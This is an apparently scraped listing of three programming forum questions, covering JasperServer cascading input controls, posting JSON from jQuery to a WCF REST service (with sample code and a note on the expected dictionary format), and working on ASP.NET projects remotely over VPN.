    As you can see in the URL, I pass the JasperServer username and password, the reportUnit name and location, and other mandatory parameters, along with the report input parameter, i.e. "parameter1", which can have a value like "value1". I used a mandatory, read-only and visible input control for this input value. Its value would come from the URL and be shown in the box, but it was read-only and hence could not be changed. The report was working absolutely fine up to this point. But the tragedy began when my client rejected this idea. He wanted a completely invisible input control on my report, with the input value passed through the URL, just as illustrated above. My client then asked me to refer to this and made me work on cascading input controls. Recently I added a cascading input control to this report. The input control type is a single-select query, which uses two parameters that I pass to the report through the URL. Now when JasperServer responds to the URL with the input parameters, all the other static parameters work properly, except the cascaded one. When I click the select box of the cascaded input, I can see the desired options for a second, and then it just goes empty while I'm viewing the select list. But when I make the "Parameter1" input control visible, the cascading input control works! And when I turn it invisible, the cascading input control turns into a beast that does things by itself and does not listen to its master. I am not able to understand why this is happening. Could anybody please provide a solution to this?

    Read the article

  • POSTing JSON data to WCF REST

    - by Randall Sexton
    I'm trying to send data from a client application using jQuery to a REST WCF service based on the WCF REST Starter Kit. Here's what I have so far.

    Service definition:

        [WebHelp(Comment = "Save PropertyValues to the database")]
        [WebInvoke(Method = "POST", UriTemplate = "PropertyValues_Save",
            BodyStyle = WebMessageBodyStyle.WrappedRequest,
            RequestFormat = WebMessageFormat.Json,
            ResponseFormat = WebMessageFormat.Json)]
        [OperationContract]
        public bool PropertyValues_Save(Guid assetId, Dictionary<Guid, string> newValues)
        {
            ...
        }

    Call from the client:

        $.ajax({
            url: SVC_PROPERTYVALUES_SAVE,
            type: "POST",
            contentType: "application/json; charset=utf-8",
            data: jsonData,
            dataType: "json",
            error: function(XMLHttpRequest, textStatus, errorThrown) {
                alert(textStatus + ' ' + errorThrown);
            },
            success: function(data) {
                if (data) {
                    alert('Values saved');
                    $("#confirmSubmit").dialog('close');
                } else {
                    alert('Values failed to save');
                    $("#confirmSubmit").dialog('close');
                }
            }
        });

    Example of the JSON being passed:

        {
            "assetId": "d70714c3-e403-4cc5-b8a9-9713d05b2ee0",
            "newValues": [
                { "key": "bd01aa88-b48d-47c7-8d3f-eadf47a46680", "value": "0e9fdf34-2d12-4639-8d70-19b88e753ab1" },
                { "key": "06e8eda2-a004-450e-90ab-64df357013cf", "value": "1d490aec-f40e-47d5-865c-07fe9624f955" }
            ]
        }

    I'm using Windows Authentication on the virtual directory. When I call operations that are GETs, everything is fine. This code prompts the browser to log in, and when I enter my credentials, I simply get an alert in my browser which says "error undefined". Even if you can't help with my specific error, do you see anything that looks wrong at a glance? I've been beating my head on this nearly all day. Thanks in advance.
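
    One thing worth double-checking is how jsonData is built. For a WrappedRequest body the top-level property names must match the operation's parameter names, and DataContractJsonSerializer normally expects a Dictionary<Guid, string> as an array of key/value pairs with capitalised Key/Value, e.g. (a sketch of the expected shape, using the GUIDs from the question):

    ```javascript
    // Wrapped body for PropertyValues_Save(Guid assetId, Dictionary<Guid, string> newValues).
    var jsonData = JSON.stringify({
        assetId: "d70714c3-e403-4cc5-b8a9-9713d05b2ee0",
        newValues: [
            { Key: "bd01aa88-b48d-47c7-8d3f-eadf47a46680", Value: "0e9fdf34-2d12-4639-8d70-19b88e753ab1" },
            { Key: "06e8eda2-a004-450e-90ab-64df357013cf", Value: "1d490aec-f40e-47d5-865c-07fe9624f955" }
        ]
    });
    ```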

    Read the article

  • advice on working on remote asp.net applications

    - by Jonesy
    Hi folks, I'm a (relatively new) developer using ASP.NET with VB.NET. Currently all my applications are developed on my PC and then built and moved onto the web server. I'm going to be working remotely for three months, during which I'll be connecting to the company network via VPN. What is the best way to access my projects? I need the projects stored on the company network so that others can access them too, so simply copying the projects to my laptop, working on them, then copying them back won't suffice. I tried just opening the projects off the network share but am getting application trust problems. I'm just wondering what other developers do in this situation? Jonesy

    Read the article
